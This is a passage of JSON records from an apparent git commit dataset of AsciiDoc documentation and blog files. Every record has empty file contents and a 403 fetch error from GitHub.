403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16dabc79fcd6192632e94f0dc91cdb325d94ecd1","subject":"Release notes for services-release 0.0.5 (#186)","message":"Release notes for services-release 0.0.5 (#186)\n\n* Release notes for services-release 0.0.5\r\n\r\n* Updates after 
feedback\r\n","repos":"hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/hawkular-services-0.0.5.Final.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/07\/05\/hawkular-services-0.0.5.Final.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0181ca0b0d8cbf288ef666f607eaa84e88e2790e","subject":"Update 2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","message":"Update 2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","new_file":"_posts\/2015-05-19-Eclipse-Mars-episode-1-Vue-hierarchique-des-projets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60e805550574facb902dfebf3a4f38197a9a2bb0","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"739aa1096fa4408a00b5610ecd4ebd96ffc69218","subject":"fix copy paste error in doc (#167)","message":"fix copy paste error in doc (#167)\n\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,resilience4j\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/dropwizard.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/dropwizard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab751ee1802b001c1650202b5afe41e6af64ff50","subject":"Better format","message":"Better 
format\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4a24c81147327b5953c79adb2bfa21cf5c969da0","subject":"SEC-2299: Document @AuthenticationPrincipal","message":"SEC-2299: Document @AuthenticationPrincipal\n","repos":"adairtaosy\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,ajdinhedzic\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,mounb\/spring-security,ollie314\/spring-security,caiwenshu\/spring-security,rwinch\/spring-security,adairtaosy\/spring-security,xingguang2013\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,tekul\/spring-security,Xcorpio\/spring-security,vitorgv\/spring-security,kazuki43zoo\/spring-security,tekul\/spring-security,jgrandja\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,caiwenshu\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,likaiwalkman\/spring-security,xingguang2013\/spring-security,ajdinhedzic\/spring-security,panchenko\/spring-security,likaiwalkman\/spring-security,MatthiasWinzeler\/spring-security,pkdevbox\/spring-security,ollie314\/spring-security,wilkinsona\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,SanjayUser\/SpringSecurityPro,wilkinsona\/spring-security,thomasdarimont\/spring-security,Peter32\/spring-security,raindev\/spring-security,mounb\/spring-security,tekul\/spring-security,zshift\/spring-security,hippostar\/spring-security,Krasnyanskiy\/spring-security,zgscwjm\/spring-security,wilkinsona\/spring-security,vitorgv\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,jmnarloch\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,hippostar\/spring-security,thomasdarimont\/spring-security,zshift\/spring-security,fhanik\/spring-security,cyratech\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,izeye\/spring-security,fhanik\/spring-security,hippostar\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,chinazhaoht\/spring-security,forestqqqq\/spring-security,forestqqqq\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,djechelon\/spring-security,pwheel\/spring-security,tekul\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,mounb\/spring-security,ractive\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,ractive\/spring-security,fhanik\/spring-security,zshift\/spring-security,Peter32\/spring-security,mrkingybc\/spring-security,mounb\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,follow99\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,MatthiasWinzeler\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,likaiwalkman\/spring-security,caiwenshu\/spring-security,izeye\/spring-security,Xcorpio\/spring-security,
wkorando\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,vitorgv\/spring-security,mdeinum\/spring-security,izeye\/spring-security,zhaoqin102\/spring-security,jmnarloch\/spring-security,driftman\/spring-security,caiwenshu\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,panchenko\/spring-security,pwheel\/spring-security,driftman\/spring-security,fhanik\/spring-security,chinazhaoht\/spring-security,SanjayUser\/SpringSecurityPro,mrkingybc\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,yinhe402\/spring-security,raindev\/spring-security,Krasnyanskiy\/spring-security,Krasnyanskiy\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,Peter32\/spring-security,zhaoqin102\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,zhaoqin102\/spring-security,yinhe402\/spring-security,olezhuravlev\/spring-security,zhaoqin102\/spring-security,follow99\/spring-security,mparaz\/spring-security,ractive\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,diegofernandes\/spring-security,mdeinum\/spring-security,cyratech\/spring-security,pkdevbox\/spring-security,yinhe402\/spring-security,pkdevbox\/spring-security,mparaz\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,raindev\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,izeye\/spring-security,driftman\/spring-security,mparaz\/spring-security,chinazhaoht\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,MatthiasWinzeler\/spring-security,liuguohua\/spring-security,ajdinhedzic\/spring-security,xingguang2013\/spring-security,fhanik\/spring-security,djechelon\/spring-security,pwheel\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,adairtaosy\/spring-security,mparaz\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,yinhe402\/spring-security,Peter32\/spring-security,fhanik\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,rwinch\/spring-security,diegofernandes\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"839eca22fcd5b4412341ae90c56f947438bc99ff","subject":"Update 2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","message":"Update 2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","new_file":"_posts\/2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"811e24372da6a428bf3f372d07e948b0a63fa6da","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"121d5cfd7f21383ce4cbe1ebc53cd1435ee5b3c1","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604975d2c1c86ecb48945e318703e60fc351bcd7","subject":"Updated docs links to point to master branches","message":"Updated docs links to point to master branches\n\nOriginal commit: elastic\/x-pack-elasticsearch@2f15df4847cf249a01061ad20f6cf21254cb4808\n","repos":"HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"watcher\/docs\/index.asciidoc","new_file":"watcher\/docs\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb0cac3c0e3acb02ed3de2d3a8bb7967b5fbde6","subject":"PLANNER-832: Write a blog post about OptaPlanner Workbench xor Execution Server","message":"PLANNER-832: Write a blog post about OptaPlanner 
Workbench xor Execution Server\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2017-08-18-OptimizeYourProblemsUsingKieServerPart.adoc","new_file":"blog\/2017-08-18-OptimizeYourProblemsUsingKieServerPart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5dc5b729a4ed488a52a9b60db6af09a0f012e26","subject":"y2b create post Unboxing The $3000 Rolling Headphones","message":"y2b create post Unboxing The $3000 Rolling Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-08-Unboxing-The-3000-Rolling-Headphones.adoc","new_file":"_posts\/2017-08-08-Unboxing-The-3000-Rolling-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7ede17b1893bad0bc7aa1c00829357f061d7dd9","subject":"Add missing docs","message":"Add missing docs\n","repos":"zregvart\/camel,adessaigne\/camel,CodeSmell\/camel,ullgren\/camel,ullgren\/camel,objectiser\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,mcollovati\/camel,apache\/camel,nicolaferraro\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel,zregvart\/camel,cunningt\/camel,zregvart\/camel,adessaigne\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,ullgren\/camel,alvinkwekel\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,tadayosi\/camel,pax95\/camel,zregvart\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,alvinkwekel\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,christophd\/camel,objectiser\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,CodeSmell\/camel,apache\/camel,CodeSmell\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,DariusX\/camel","old_file":"components\/camel-attachments\/src\/main\/docs\/attachments.adoc","new_file":"components\/camel-attachments\/src\/main\/docs\/attachments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e7880a978f6c399f9d0b45bcc732055f171305a","subject":"Add release notes 5.1.0-M2 document","message":"Add release notes 5.1.0-M2 
document\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.1.0-M2.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.1.0-M2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"65a12d21f95faeefebcc28aa807f765111c99052","subject":"Adding feedback on standalone alert component","message":"Adding feedback on standalone alert component\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31198bf2ee8b343feb074e3d85a4e85d98d2c42b","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6d8a46347eadf2261425cd14aefb6a7b3f2bdf","subject":"update Readme","message":"update Readme\n","repos":"cranej\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cranej\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90bf7cf1311400302d6bc52ebef8f23949d1641c","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"nithril\/YaPetStore,nithril\/YaPetStore,nithril\/YaPetStore","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nithril\/YaPetStore.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef024816328c9a0bf55ea89bc3728057fc69883d","subject":"Developer guide moved","message":"Developer guide moved","repos":"jsanda\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jpkrohling\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"748b171f32e19d793929fa28b1b6e560388c9d83","subject":"Create README.adoc","message":"Create README.adoc","repos":"adoc-editor\/documentation","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"687f734753d9a6bf855d20aba639c80adbd3cd6e","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"592d2f90cf04edcea742e202fc0f1d0d681ec50c","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526047331101ac5dffa4cee13bbbb6f1c149e8eb","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fa9ef76623098bcff0943b38afeed8afd5540a8","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"382caa9f1af2fa6d9c2fb28b813d5cdd4f23e4f8","subject":"Update 2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27347040bf6fb5f5ab53118b1e8b4537bbef9874","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93917baac15fc87c8880fd9b2c532d63849d3b18","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f71387adf49d495b28e0662d531346e381a0a31","subject":"Update 2018-04-02-earth.adoc","message":"Update 2018-04-02-earth.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-04-02-earth.adoc","new_file":"_posts\/2018-04-02-earth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8e81e0d5fd93641cc3da5ab3ad656b592710259","subject":"y2b create post New Nexus 7 Unboxing \\u0026 First Look! (Google Nexus 7 2013)","message":"y2b create post New Nexus 7 Unboxing \\u0026 First Look! 
(Google Nexus 7 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-27-New-Nexus-7-Unboxing-u0026-First-Look-Google-Nexus-7-2013.adoc","new_file":"_posts\/2013-07-27-New-Nexus-7-Unboxing-u0026-First-Look-Google-Nexus-7-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e26a2265ebfed21f6c460815facb8b3dd73d728","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8faec37c57561b935fb06e80741edb99253b4152","subject":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","message":"Update 